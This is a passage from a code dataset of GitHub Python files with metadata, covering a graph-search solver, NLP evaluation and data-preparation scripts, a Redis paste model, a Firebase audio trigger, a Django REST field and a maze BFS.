1)\n last_matched_vertex[vertex] = (-1,-1,-1)\n#print(vertex_to_sibling)\n\ncurrent_solution_stack= [((0,0,0),(1,0,0))] #第一对点可任意\npending_vertex.remove((0,0,0))\npending_vertex.remove((1,0,0))\nwhile len(current_solution_stack) > 0:\n next_vertex_group = search_next_group_vertex()\n if next_vertex_group != None:\n #print(\"next_vertex_group is %s\" % str(next_vertex_group))\n #print(last_matched_vertex[next_vertex_group[0]])\n #测试是否重复匹配,若重复,则需要继续退栈\n if last_matched_vertex[next_vertex_group[0]] == next_vertex_group[1]:\n #清除当前匹配点信息,以便继续匹配\n last_matched_vertex[next_vertex_group[0]] = (-1, -1, -1)\n #print(last_matched_vertex[next_vertex_group[0]])\n last_vertex_group = current_solution_stack.pop()\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n #print(\"current pending vertex is %s\" % str(pending_vertex))\n continue\n else:\n last_matched_vertex[next_vertex_group[0]] = next_vertex_group[1]\n current_solution_stack.append(next_vertex_group)\n pending_vertex.remove(next_vertex_group[0])\n pending_vertex.remove(next_vertex_group[1])\n #print(pending_vertex)\n if len(current_solution_stack) == 6:\n if test_solution():\n print(\"Congratulation, found a soultion!!!\")\n #print(current_solution_stack)\n break\n else:\n last_vertex_group = current_solution_stack.pop()\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n else:\n continue\n else:\n #print(\"can't find solution for vertex. now soutlion stack is %s\" %\n # str(current_solution_stack))\n last_vertex_group = current_solution_stack.pop()\n #print(\"last vertex group is %s\" % str(last_vertex_group))\n pending_vertex.append(last_vertex_group[0])\n pending_vertex.append(last_vertex_group[1])\n pending_vertex.sort()\n #print(\"pending vertex group is %s\" % str(pending_vertex))\nif len(current_solution_stack) == 0:\n print(\"No soultion is found.\")\nelse:\n adjancent_matrix = gen_adjacent_matrix()\n print(\"adjance_matrix is \\n %s\" % str(adjancent_matrix))\n print(lambda_compatible(adjancent_matrix))\n print(mu_compatible(adjancent_matrix))\n print(meets_adjacency_requirements(adjancent_matrix, debug=True))\n print(graph_is_valid(adjancent_matrix))\n", "repo_name": "YouhuaLi/math_misc", "sub_path": "srg_solver/srg.py", "file_name": "srg.py", "file_ext": "py", "file_size_in_byte": 6209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "71921350564", "text": "from predict import PredictionModel\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification\nfrom seqeval.metrics import (\n f1_score,\n precision_score,\n recall_score,\n accuracy_score,\n performance_measure,\n classification_report,\n)\nfrom sklearn.metrics import confusion_matrix\nimport argparse\nfrom glob import glob\nimport os\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--labels\", required=True)\nparser.add_argument(\"--model_name_or_path\", required=True)\nparser.add_argument(\"--output_dir\", required=True)\nparser.add_argument(\"--test_relations\", required=True)\nparser.add_argument(\"--data_dir\", required=True)\nparser.add_argument(\"--test_entity\", required=True)\nparser.add_argument(\"--summary_dir\", required=True)\n\nargs = parser.parse_args()\n\nfinal_args = {\n \"max_seq_length\": 512,\n \"disable_tqdm\": True,\n \"output_dir\": args.output_dir,\n \"labels\": args.labels,\n \"model_name_or_path\": args.model_name_or_path,\n \"per_device_eval_batch_size\": 1,\n \"fp16\": True,\n}\npredmodel = PredictionModel(final_args)\ntokenizer = AutoTokenizer.from_pretrained(\"distilroberta-base\")\n\ncolor_dict = {\n \"O\": \"\\u001b[0m\",\n \"B-EXPL_VAR\": \"\\u001b[38;5;\" + \"1\" + \"m\",\n \"I-EXPL_VAR\": \"\\u001b[38;5;\" + \"124\" + \"m\",\n \"B-OUTCOME_VAR\": \"\\u001b[38;5;\" + \"2\" + \"m\",\n \"I-OUTCOME_VAR\": \"\\u001b[38;5;\" + \"28\" + \"m\",\n \"B-HR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-HR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-OR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-OR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-RR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"I-RR\": \"\\u001b[38;5;\" + \"3\" + \"m\",\n \"B-BASELINE\": \"\\u001b[38;5;\" + \"21\" + \"m\",\n \"I-BASELINE\": \"\\u001b[38;5;\" + \"4\" + \"m\",\n}\n\nREL_SUMMARY_FILENAME = os.path.join(args.summary_dir, \"relation_stats.csv\")\nENT_SUMMARY_FILENAME = os.path.join(args.summary_dir, \"entity_stats.csv\")\nsplit_model = args.model_name_or_path.split(\"/\")\nmodel_name = \"-\".join(split_model[-1].split(\"-\")[:-1])\nseed = split_model[-1].split(\"-\")[-1]\nmodel_type = split_model[-2][13:]\nif \"_nc\" in model_type:\n model_type = model_type[:-3]\nmodel_context = split_model[-2][-3:] == \"_nc\"\n\n\ndef pretty_iob(data_str):\n pretty_string = \"\\u001b[0m\"\n for line in data_str.split(\"\\n\"):\n cols = line.split(\"\\t\")\n if len(cols) > 1:\n token = tokenizer.convert_tokens_to_string(cols[0])\n entity_label = cols[1]\n pretty_string += color_dict[entity_label]\n pretty_string += token\n return pretty_string\n\n\ndef print_debug_info():\n print(\"eval_loss\", eval_loss)\n print(predmodel.generate_iob(trim_pred_ent_labels, data_str))\n\n\n\ndef append_entity_stats(text):\n if not os.path.isfile(ENT_SUMMARY_FILENAME):\n with open(os.path.join(ENT_SUMMARY_FILENAME), \"x\") as csvfile:\n csvfile.write(\"model,no_context,type,seed,\")\n csvfile.write(\"label_name,prec,recall,f1,support\\n\")\n with open(os.path.join(ENT_SUMMARY_FILENAME), \"a\") as csvfile:\n csvfile.write(text)\n\n\ndef append_relation_stats(text):\n if not os.path.isfile(REL_SUMMARY_FILENAME):\n with open(os.path.join(REL_SUMMARY_FILENAME), \"x\") as csvfile:\n csvfile.write(\"model,no_context,type,seed,sentence_id,\")\n csvfile.write(\"mcc,acc,prec,recall,f1\\n\")\n with open(os.path.join(REL_SUMMARY_FILENAME), \"a\") as csvfile:\n csvfile.write(text)\n\n\ndef get_relation_stats(true, pred):\n tn, fp, fn, tp = confusion_matrix(true, pred, labels=[0, 1]).ravel()\n ret_dict = {}\n ret_dict[\"acc\"] = (tp + tn) / (tp + tn + fp + fn)\n ret_dict[\"prec\"] = tp / (tp + fp) if (tp + fp > 0) else 0\n ret_dict[\"recall\"] = tp / (tp + fn) if (tp + fn > 0) else 0\n ret_dict[\"f1\"] = 2 * tp / (2 * tp + fp + fn) if (2 * tp + fp + fn > 0) else 0\n if (tp + fp) * (tp + fn) * (tn + fp) * (tn + fn) == 0:\n ret_dict[\"mcc\"] = 0\n else:\n ret_dict[\"mcc\"] = (tp * tn - fp * fn) / (\n ((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5\n )\n return ret_dict\n\n\nall_trim_true_ent_labels = []\nall_trim_pred_ent_labels = []\nall_true_rels = []\nall_pred_rels = []\n\nrel_sentw_mcc = 0\nrel_sentw_acc = 0\nrel_sentw_prec = 0\nrel_sentw_recall = 0\nrel_sentw_f1 = 0\nsentw_count = 0\n\nfor foldername in sorted(glob(os.path.join(args.data_dir, \"\") + \"/*/\")):\n sentence_id = foldername.rstrip('/').split('/')[-1]\n print(\"\\nExample ID:\", foldername)\n if args.test_entity == \"1\":\n data_str = predmodel.set_relation(\n open(foldername + \"./entity.txt\", \"r\").read(), None\n )\n dataset = predmodel.create_dataset(data_str)\n (\n pred_rels,\n true_rels,\n pred_entity_ids,\n true_entity_ids,\n eval_loss,\n ) = predmodel.do_predict(dataset)\n (\n trim_pred_ent_labels,\n trim_true_ent_labels,\n ) = predmodel.trim_and_convert_entity_ids(pred_entity_ids, true_entity_ids)\n all_trim_true_ent_labels += trim_true_ent_labels\n all_trim_pred_ent_labels += trim_pred_ent_labels\n\n results = {\n \"precision\": precision_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"recall\": recall_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"f1\": f1_score(trim_true_ent_labels, trim_pred_ent_labels),\n \"performance_measure\": performance_measure(\n trim_true_ent_labels, trim_pred_ent_labels\n ),\n }\n os.makedirs(os.path.join(args.output_dir, sentence_id), exist_ok=True)\n with open(os.path.join(args.output_dir, sentence_id, \"entity.txt\"), \"w\") as pred_iob_file:\n # we need to readd context if it was in the original string\n if \"CONTEXT_END\" in data_str:\n pred_iob_file.write(data_str.split(\"CONTEXT_END\")[0] + \"CONTEXT_END\" + \"\\n\")\n pred_iob_file.write(predmodel.generate_iob(trim_pred_ent_labels, data_str))\n print(\"Metrics:\", results)\n print(\n \"Pred:\",\n pretty_iob(predmodel.generate_iob(trim_pred_ent_labels, data_str)),\n )\n print(\n \"True:\",\n pretty_iob(predmodel.generate_iob(trim_true_ent_labels, data_str)),\n )\n if args.test_relations == \"1\":\n concat_true_rels = []\n concat_pred_rels = []\n for relation_file in sorted(\n glob(os.path.join(foldername, \"\") + \"/relation_*.txt\")\n ):\n data_str = open(relation_file, \"r\").read()\n dataset = predmodel.create_dataset(data_str)\n (\n pred_rels,\n true_rels,\n pred_entity_ids,\n true_entity_ids,\n eval_loss,\n ) = predmodel.do_predict(dataset)\n\n concat_true_rels += list(true_rels)\n concat_pred_rels += list(pred_rels)\n all_true_rels += list(true_rels)\n all_pred_rels += list(pred_rels)\n sentw_count += 1\n rel_stats = get_relation_stats(concat_true_rels, concat_pred_rels)\n rel_sentw_mcc += rel_stats[\"mcc\"]\n rel_sentw_acc += rel_stats[\"acc\"]\n rel_sentw_prec += rel_stats[\"prec\"]\n rel_sentw_recall += rel_stats[\"recall\"]\n rel_sentw_f1 += rel_stats[\"f1\"]\n\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},{sentence_id},\"\n )\n append_relation_stats(\n f\"{rel_stats['mcc']},{rel_stats['acc']},{rel_stats['prec']},{rel_stats['recall']},{rel_stats['f1']}\\n\"\n )\n\nif args.test_relations == \"1\":\n rel_stats = get_relation_stats(all_true_rels, all_pred_rels)\n\n rel_sentw_mcc /= sentw_count\n rel_sentw_acc /= sentw_count\n rel_sentw_prec /= sentw_count\n rel_sentw_recall /= sentw_count\n rel_sentw_f1 /= sentw_count\n\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},AGGREGATE,\"\n )\n append_relation_stats(\n f\"{rel_stats['mcc']},{rel_stats['acc']},{rel_stats['prec']},{rel_stats['recall']},{rel_stats['f1']}\\n\"\n )\n append_relation_stats(\n f\"{model_name},{str(model_context)},{model_type},{seed},SENTW_AVG,\"\n )\n append_relation_stats(\n f\"{rel_sentw_mcc},{rel_sentw_acc},{rel_sentw_prec},{rel_sentw_recall},{rel_sentw_f1}\\n\"\n )\n\nif args.test_entity == \"1\":\n print(\n \"performance_measure\",\n performance_measure(all_trim_true_ent_labels, all_trim_pred_ent_labels),\n )\n print(classification_report(all_trim_true_ent_labels, all_trim_pred_ent_labels))\n entity_stats = classification_report(\n all_trim_true_ent_labels,\n all_trim_pred_ent_labels,\n output_dict=True,\n )\n\n for label, stats in entity_stats.items():\n append_entity_stats(f\"{model_name},{str(model_context)},{model_type},{seed},\")\n append_entity_stats(\n f\"{label},{stats['precision']},{stats['recall']},{stats['f1-score']},{stats['support']}\\n\"\n )\n", "repo_name": "yoonsikp/clerx_lm", "sub_path": "model/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 8928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "predict.PredictionModel", "line_number": 36, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 37, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 103, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "seqeval.metrics.precision_score", "line_number": 153, "usage_type": "call"}, {"api_name": "seqeval.metrics.recall_score", "line_number": 154, "usage_type": "call"}, {"api_name": "seqeval.metrics.f1_score", "line_number": 155, "usage_type": "call"}, {"api_name": "seqeval.metrics.performance_measure", "line_number": 156, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path", "line_number": 161, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "seqeval.metrics.performance_measure", "line_number": 235, "usage_type": "call"}, {"api_name": "seqeval.metrics.classification_report", "line_number": 237, "usage_type": "call"}, {"api_name": "seqeval.metrics.classification_report", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "22897566340", "text": "from datasets import load_dataset, load_from_disk\nfrom transformers import AutoTokenizer\n\n# raw_datasets = load_dataset(\"squad\")\n# raw_datasets.save_to_disk(\"datasets/squad\")\nraw_datasets = load_from_disk(\"datasets/squad\")\n\nmodel_checkpoint = \"bert-base-cased\"\ntokenizer = AutoTokenizer.from_pretrained(model_checkpoint)\n\ninputs = tokenizer(\n raw_datasets[\"train\"][2:6][\"question\"],\n raw_datasets[\"train\"][2:6][\"context\"],\n max_length=100,\n truncation=\"only_second\",\n stride=50,\n return_overflowing_tokens=True,\n return_offsets_mapping=True,\n)\n\nanswers = raw_datasets[\"train\"][2:6][\"answers\"]\nstart_positions = []\nend_positions = []\n\nfor i, offset in enumerate(inputs[\"offset_mapping\"]):\n sample_idx = inputs[\"overflow_to_sample_mapping\"][i]\n answer = answers[sample_idx]\n start_char = answer[\"answer_start\"][0]\n end_char = answer[\"answer_start\"][0] + len(answer[\"text\"][0])\n sequence_ids = inputs.sequence_ids(i)\n\n # Find the start and end of the context\n idx = 0\n while sequence_ids[idx] != 1:\n idx += 1\n context_start = idx\n while sequence_ids[idx] == 1:\n idx += 1\n context_end = idx - 1\n\n # If the answer is not fully inside the context, label is (0, 0)\n if offset[context_start][0] > start_char or offset[context_end][1] < end_char:\n start_positions.append(0)\n end_positions.append(0)\n else:\n # Otherwise it's the start and end token positions\n idx = context_start\n while idx <= context_end and offset[idx][0] <= start_char:\n idx += 1\n start_positions.append(idx - 1)\n\n idx = context_end\n while idx >= context_start and offset[idx][1] >= end_char:\n idx -= 1\n end_positions.append(idx + 1)\n\nidx = 0\nsample_idx = inputs[\"overflow_to_sample_mapping\"][idx]\nanswer = answers[sample_idx][\"text\"][0]\n\nstart = start_positions[idx]\nend = end_positions[idx]\nlabeled_answer = tokenizer.decode(inputs[\"input_ids\"][idx][start : end + 1])\n\nprint(f\"Theoretical answer: {answer}, labels give: {labeled_answer}\")", "repo_name": "Parkerlee0619/NLP-course", "sub_path": "tasks/question_answering/question_answering_00.py", "file_name": "question_answering_00.py", "file_ext": "py", "file_size_in_byte": 2061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datasets.load_from_disk", "line_number": 6, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 9, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "6102581107", "text": "import os\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport pandas as pd\nfrom tqdm import tqdm\nfrom EuroVocAnalyzeTool import Graph, EuroVocAnalyzeTool\nimport pickle\nimport argparse\n\nLANGUAGES = \"en\"\nSAVE_PATH = \"datasets/jrc_en_basic.csv\"\n\n\n## Micro-Thesaurus\ndef get_MThesaurus(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n mthes = analyzeTool.getThesaurusByDescId(desc_id)\n if mthes:\n for mthes_id in mthes:\n if not mthes_id in ret:\n ret.append(mthes_id)\n return ';'.join(ret)\n\n\n## Domains\ndef get_domains(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n domains = analyzeTool.getDomainsByDescId(desc_id)\n if domains:\n for domain_id in domains:\n if not domain_id in ret:\n ret.append(domain_id)\n return ';'.join(ret)\n\n\n## Topterms\ndef get_topterms(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n topterms = analyzeTool.getTopTermsByDescid(desc_id)\n if topterms:\n for topterm_id in topterms:\n if not topterm_id in ret:\n ret.append(topterm_id)\n else:\n ret.append(desc_id)\n return ';'.join(ret)\n\n\n## extended Descriptors\ndef get_extDesc(descriptors, analyzeTool):\n ret = []\n for desc_id in descriptors.split(';'):\n topterms = analyzeTool.getParents(desc_id)\n if topterms:\n for topterm_id in topterms:\n if not topterm_id in ret:\n ret.append(topterm_id)\n else:\n ret.append(desc_id)\n return ';'.join(ret)\n\n\ndef parseXML(path, filename, sep='\\n', section_sep=' #S# '):\n with open(path + '/' + filename) as fin:\n xmlFile = fin.read()\n parsedXml = BeautifulSoup(xmlFile, features=\"html.parser\")\n\n body = signature = annex = ''\n\n try:\n tagclasscode = ';'.join([p.text for p in parsedXml.find('textclass').find_all('classcode')])\n except:\n tagclasscode = ''\n\n divs = parsedXml.find('text').find_all('div')\n for div in divs:\n text = sep.join([p.text for p in div.find_all('p')])\n if div.get('type') == 'body':\n body = text\n elif div.get('type') == 'signature':\n signature = text\n elif div.get('type') == 'annex':\n annex = text\n return body + section_sep + signature + section_sep + annex, tagclasscode\n\n\ndef prepareDataset(languages, datasetSplit, save_path):\n def getSplit(celex_id, trainset, valset, testset):\n if celex_id in trainset:\n return 'train'\n elif celex_id in valset:\n return 'val'\n elif celex_id in testset:\n return 'test'\n else:\n return 'no split'\n\n dir_path = SAVE_PATH[:save_path.rfind('/') + 1]\n Path(dir_path).mkdir(parents=True, exist_ok=True)\n COLNAMES = ['celex_id', 'lang', 'year', 'text', 'Descriptors']\n data = pd.DataFrame(columns=COLNAMES)\n\n for lang in languages.split(\",\"):\n for dirname in tqdm(os.listdir(\"./tmp/\" + lang)):\n path = \"./tmp/\" + lang + \"/\" + dirname\n if os.path.isdir(path):\n for filename in os.listdir(path):\n celex_id = filename[3:-7]\n try:\n text, tagclasscode = parseXML(path, filename, sep=' #NP# ')\n data.loc[len(data)] = [celex_id, lang, dirname, text, tagclasscode]\n except Exception as ex:\n print(ex)\n print(path + '/' + filename)\n\n with open('data/EuroVocAnalysisTool.pickle', 'rb') as handle:\n analyzeTool = pickle.load(handle)\n\n # Extend Dataset\n data['Domains'] = data['Descriptors'].apply(lambda w: get_domains(w, analyzeTool))\n data['MThesaurus'] = data['Descriptors'].apply(lambda w: get_MThesaurus(w, analyzeTool))\n data['Topterm'] = data['Descriptors'].apply(lambda w: get_topterms(w, analyzeTool))\n data['ExtDesc'] = data['Descriptors'].apply(lambda w: get_extDesc(w, analyzeTool))\n\n # Add Iterative Split\n with open(datasetSplit + '/train.txt') as fin:\n trainset = [line.strip() for line in fin]\n with open(datasetSplit + '/validation.txt') as fin:\n valset = [line.strip() for line in fin]\n with open(datasetSplit + '/test.txt') as fin:\n testset = [line.strip() for line in fin]\n data['split'] = data['celex_id'].apply(lambda w: getSplit(w, trainset, valset, testset))\n\n data.to_csv(save_path, index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\"Download and prepare JRC-Aquis dataset\")\n parser.add_argument(\"--languages\",\n default=\"en\",\n help=\"supported languages separated by commas: \\n\"\n + \"List of supported Languages: en, de, it, fr\", type=str)\n parser.add_argument(\"--dataset_split\", help=\"path to dataset split files\", type=str)\n parser.add_argument(\"--save_path\", help=\"path of the dataset\", type=str)\n\n args = parser.parse_args()\n\n languages = args.languages\n datasetSplit = args.dataset_split\n save_path = args.save_path\n\n prepareDataset(languages, datasetSplit, save_path)\n", "repo_name": "zeinsh/Legal-Docs-Large-MLTC", "sub_path": "prepare_jrc_data.py", "file_name": "prepare_jrc_data.py", "file_ext": "py", "file_size_in_byte": 5326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 69, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 102, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 104, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 107, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 110, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 120, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "30278219044", "text": "import uuid\n\n\nclass ConfigurationError(Exception):\n pass\n\n\nclass NotFound(Exception):\n pass\n\n\nclass RedisModel:\n NotFound = NotFound\n\n @classmethod\n def set_connection(cls, redis_connection):\n if getattr(cls, '_redis_connection', None):\n raise ConfigurationError('Connection already set')\n cls._redis_connection = redis_connection\n\n\nclass Paste(RedisModel):\n def __init__(self, content, key=None):\n self.content = content\n self.key = key\n\n @classmethod\n def find(cls, key):\n content = cls._redis_connection.get(key)\n if content is None:\n raise cls.NotFound(key)\n return cls(content=content, key=key)\n\n def save(self, timeout=60 * 60):\n \"\"\"Save paste in database\n\n If paste has key assigned, paste will be updated only if already stored\n in database. Otherwise, unique key will be generated.\n \"\"\"\n r = self._redis_connection\n\n if self.key:\n if not r.set(self.key, self.content, xx=True):\n raise self.NotFound(\"not stored\")\n\n while True:\n key = str(uuid.uuid4())\n if r.set(key, self.content, nx=True, ex=timeout):\n self.key = key\n break\n return self\n\n def delete(self):\n \"\"\"Delete paste from database.\n\n If paste does not exist in database, :exc:`NotFound` exception will be\n raised.\n \"\"\"\n if not self.key:\n raise self.NotFound(\"instance does not have key\")\n if not self._redis_connection.delete(self.key):\n raise self.NotFound(\"not stored\")\n self.key = None\n return self\n", "repo_name": "sbrandtb/bytebin", "sub_path": "bytebin/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "14499935102", "text": "import pyrebase\nfrom sonido import audio\nimport os\nimport threading\nimport time\nconfig = {\n \"apiKey\": \"AIzaSyAMTu6x5C8BT3F3rUgXmZTA8UocJO-29Rk\",\n \"authDomain\": \"prueba-storage-python.firebaseapp.com\",\n \"databaseURL\": \"https://prueba-storage-python.firebaseio.com\",\n \"projectId\": \"prueba-storage-python\",\n \"storageBucket\": \"prueba-storage-python.appspot.com\",\n \"messagingSenderId\": \"572392876919\"\n}\n\nfirebase = pyrebase.initialize_app(config)\nstorage = firebase.storage()\ndb = firebase.database()\na = audio(\"d.mp3\")\n##storage.child(\"pruebas/prueba1.py\").put(\"d.mp3\")\n\ndef stop():\n time.sleep(5)\n os.system(\"pkill mpg123\")\n\n\ndef stream_user(message):\n print(message)\n if message[\"data\"]:\n t = threading.Thread(target=stop)\n t.start()\n a.play()\nstream = db.child(\"audio\").stream(stream_user)\n", "repo_name": "marteoma/DigitalesProyecto", "sub_path": "prueba.firebase.py", "file_name": "prueba.firebase.py", "file_ext": "py", "file_size_in_byte": 840, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrebase.initialize_app", "line_number": 15, "usage_type": "call"}, {"api_name": "sonido.audio", "line_number": 18, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 22, "usage_type": "call"}, {"api_name": "os.system", "line_number": 23, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "34815081494", "text": "from collections import OrderedDict\nimport ujson\n\nimport six\nfrom django.db.models.manager import BaseManager\nfrom rest_framework_json_api.relations import ResourceRelatedField\n\nfrom zc_common.remote_resource.models import RemoteResource\n\n\nclass RemoteResourceField(ResourceRelatedField):\n\n def __init__(self, related_resource_path=None, **kwargs):\n if 'model' not in kwargs:\n kwargs['model'] = RemoteResource\n if not kwargs.get('read_only', None):\n # The queryset is required to be not None, but not used\n # due to the overriding of the methods below.\n kwargs['queryset'] = {}\n\n if related_resource_path is None:\n raise NameError('related_resource_path parameter must be provided')\n\n self.related_resource_path = related_resource_path\n\n super(RemoteResourceField, self).__init__(**kwargs)\n\n def get_links(self, obj=None, lookup_field='pk'):\n request = self.context.get('request', None)\n view = self.context.get('view', None)\n return_data = OrderedDict()\n\n kwargs = {lookup_field: getattr(obj, lookup_field) if obj else view.kwargs[lookup_field]}\n\n self_kwargs = kwargs.copy()\n self_kwargs.update({'related_field': self.field_name if self.field_name else self.parent.field_name})\n self_link = self.get_url('self', self.self_link_view_name, self_kwargs, request)\n\n # Construct the related link using the passed related_resource_path\n # self.source is the field name; getattr(obj, self.source) returns the\n # RemoteResource object or RelatedManager in the case of a to-many relationship.\n related_obj = getattr(obj, self.source)\n if related_obj and related_obj.id:\n if isinstance(related_obj, BaseManager):\n list_of_ids = related_obj.values_list('pk', flat=True)\n query_parameters = 'filter[id__in]={}'.format(','.join([str(pk) for pk in list_of_ids]))\n related_path = self.related_resource_path.format(pk=query_parameters)\n else:\n related_path = self.related_resource_path.format(pk=related_obj.id)\n related_link = request.build_absolute_uri(related_path)\n else:\n related_link = None\n\n if self_link:\n return_data.update({'self': self_link})\n if related_link:\n return_data.update({'related': related_link})\n return return_data\n\n def to_internal_value(self, data):\n if isinstance(data, six.text_type):\n try:\n data = ujson.loads(data)\n except ValueError:\n self.fail('incorrect_type', data_type=type(data).__name__)\n if not isinstance(data, dict):\n self.fail('incorrect_type', data_type=type(data).__name__)\n\n if 'type' not in data:\n self.fail('missing_type')\n\n if 'id' not in data:\n self.fail('missing_id')\n\n return RemoteResource(data['type'], data['id'])\n\n def to_representation(self, value):\n return OrderedDict([('type', value.type), ('id', str(value.id))])\n", "repo_name": "ZeroCater/zc_common", "sub_path": "zc_common/remote_resource/relations.py", "file_name": "relations.py", "file_ext": "py", "file_size_in_byte": 3127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework_json_api.relations.ResourceRelatedField", "line_number": 11, "usage_type": "name"}, {"api_name": "zc_common.remote_resource.models.RemoteResource", "line_number": 15, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models.manager.BaseManager", "line_number": 44, "usage_type": "argument"}, {"api_name": "six.text_type", "line_number": 61, "usage_type": "attribute"}, {"api_name": "ujson.loads", "line_number": 63, "usage_type": "call"}, {"api_name": "zc_common.remote_resource.models.RemoteResource", "line_number": 75, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 78, "usage_type": "call"}]} +{"seq_id": "70212758565", "text": "import sys\r\nfrom collections import deque\r\n\r\n\r\nclass Maze:\r\n def __init__(self) -> None:\r\n self.N: int\r\n self.M: int\r\n self.mat: list[list[int]]\r\n self.get_info()\r\n\r\n def get_info(self) -> None:\r\n self.N, self.M = map(int, input().split())\r\n self.mat = [list(map(int, list(input().strip())))\r\n for _ in range(self.N)]\r\n\r\n def move(self) -> int:\r\n visited = [[[0] * 2 for _ in range(self.M)] for _ in range(self.N)]\r\n visited[0][0][0] = 1\r\n Q = deque([(0, 0, 0)])\r\n Dx = [0, 0, -1, 1]\r\n Dy = [-1, 1, 0, 0]\r\n while Q:\r\n i, j, k = Q.popleft()\r\n if i == self.N - 1 and j == self.M - 1:\r\n return visited[i][j][k]\r\n for dx, dy in zip(Dx, Dy):\r\n x = i + dx\r\n y = j + dy\r\n if 0 <= x < self.N and 0 <= y < self.M:\r\n if self.mat[x][y] == 1 and k == 0 and not 